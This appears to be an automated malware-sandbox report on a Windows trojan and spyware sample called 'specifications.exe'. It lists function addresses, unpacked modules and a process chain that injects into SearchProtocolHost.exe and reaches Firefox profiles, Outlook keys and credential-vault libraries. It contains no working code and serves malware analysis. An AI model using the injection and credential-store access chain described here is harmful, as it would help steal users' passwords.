                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D8EDE6_2_032D8EDE
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D8ED46_2_032D8ED4
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DACBE6_2_032DACBE
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BC20007_2_00BC2000
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF01AA7_2_00BF01AA
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE41A27_2_00BE41A2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE81CC7_2_00BE81CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCA1187_2_00BCA118
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B201007_2_00B20100
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BB81587_2_00BB8158
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BB02C07_2_00BB02C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD02747_2_00BD0274
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3E3F07_2_00B3E3F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF03E67_2_00BF03E6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEA3527_2_00BEA352
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDE4F67_2_00BDE4F6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD44207_2_00BD4420
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE24467_2_00BE2446
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF05917_2_00BF0591
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B305357_2_00B30535
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4C6E07_2_00B4C6E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2C7C07_2_00B2C7C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B307707_2_00B30770
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B547507_2_00B54750
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B168B87_2_00B168B8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B5E8F07_2_00B5E8F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3A8407_2_00B3A840
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B328407_2_00B32840
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B329A07_2_00B329A0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BFA9A67_2_00BFA9A6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B469627_2_00B46962
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2EA807_2_00B2EA80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE6BD77_2_00BE6BD7
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEAB407_2_00BEAB40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD0CB57_2_00BD0CB5
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B20CF27_2_00B20CF2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B30C007_2_00B30C00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B48DBF7_2_00B48DBF
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2ADE07_2_00B2ADE0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCCD1F7_2_00BCCD1F
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3AD007_2_00B3AD00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B42E907_2_00B42E90
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BECE937_2_00BECE93
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEEEDB7_2_00BEEEDB
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEEE267_2_00BEEE26
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B30E597_2_00B30E59
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BAEFA07_2_00BAEFA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B22FC87_2_00B22FC8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B50F307_2_00B50F30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD2F307_2_00BD2F30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B72F287_2_00B72F28
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA4F407_2_00BA4F40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE70E97_2_00BE70E9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF0E07_2_00BEF0E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDF0CC7_2_00BDF0CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B370C07_2_00B370C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3B1B07_2_00B3B1B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B1F1727_2_00B1F172
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BFB16B7_2_00BFB16B
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B6516C7_2_00B6516C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B352A07_2_00B352A0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4D2F07_2_00B4D2F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD12ED7_2_00BD12ED
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4B2C07_2_00B4B2C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B7739A7_2_00B7739A
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE132D7_2_00BE132D
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B1D34C7_2_00B1D34C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF43F7_2_00BEF43F
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B214607_2_00B21460
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCD5B07_2_00BCD5B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF95C37_2_00BF95C3
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE75717_2_00BE7571
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE16CC7_2_00BE16CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B756307_2_00B75630
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF7B07_2_00BEF7B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B338E07_2_00B338E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B9D8007_2_00B9D800
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BC59107_2_00BC5910
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B399507_2_00B39950
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4B9507_2_00B4B950
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCDAAC7_2_00BCDAAC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B75AA07_2_00B75AA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD1AA37_2_00BD1AA3
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDDAC67_2_00BDDAC6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA3A6C7_2_00BA3A6C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFA497_2_00BEFA49
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE7A467_2_00BE7A46
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4FB807_2_00B4FB80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA5BF07_2_00BA5BF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B6DBF97_2_00B6DBF9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFB767_2_00BEFB76
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFCF27_2_00BEFCF2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA9C327_2_00BA9C32
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4FDC07_2_00B4FDC0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE7D737_2_00BE7D73
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE1D5A7_2_00BE1D5A
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B33D407_2_00B33D40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B39EB07_2_00B39EB0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFFB17_2_00BEFFB1
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B31F927_2_00B31F92
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF3FD57_2_00AF3FD5
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF3FD27_2_00AF3FD2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFF097_2_00BEFF09
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001220107_2_00122010
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011CF007_2_0011CF00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B1167_2_0011B116
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B1207_2_0011B120
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011D1207_2_0011D120
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B2707_2_0011B270
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B2647_2_0011B264
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B3387_2_0011B338
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001256907_2_00125690
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001238907_2_00123890
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0013BCD07_2_0013BCD0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE3587_2_009EE358
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE4737_2_009EE473
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ED8D87_2_009ED8D8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE80E7_2_009EE80E
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ECB357_2_009ECB35
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ECB787_2_009ECB78
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B1B970 appears 262 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B9EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00BAF290 appears 103 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B65130 appears 58 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B77E54 appears 107 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 0110F290 appears 103 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010C5130 appears 58 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010FEA12 appears 86 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 0107B970 appears 262 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010D7E54 appears 107 times
                      Source: specifications.exe, 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1745391025.000000000B9C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000000.1689473956.0000000000E88000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexxYf.exe4 vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1733073059.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs specifications.exe
                      Source: specifications.exe, 00000002.00000002.2040922349.000000000117D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs specifications.exe
                      Source: specifications.exeBinary or memory string: OriginalFilenamexxYf.exe4 vs specifications.exe
                      Source: specifications.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specifications.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, iRgP998qB2GsmTBLH3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, iRgP998qB2GsmTBLH3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, iRgP998qB2GsmTBLH3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@19/12
                      Source: C:\Users\user\Desktop\specifications.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\specifications.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Users\user\AppData\Local\Temp\sE716IK71MJump to behavior
                      Source: specifications.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: specifications.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SearchProtocolHost.exe, 00000007.00000003.2218657622.0000000000488000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2218543579.0000000000467000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: specifications.exeReversingLabs: Detection: 50%
                      Source: unknownProcess created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"
                      Source: C:\Users\user\Desktop\specifications.exeProcess created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\specifications.exeProcess created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: specifications.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: specifications.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: neghZqrDWkxUmu.exe, 00000006.00000002.4144559573.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145192109.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specifications.exe, specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdbUGP source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
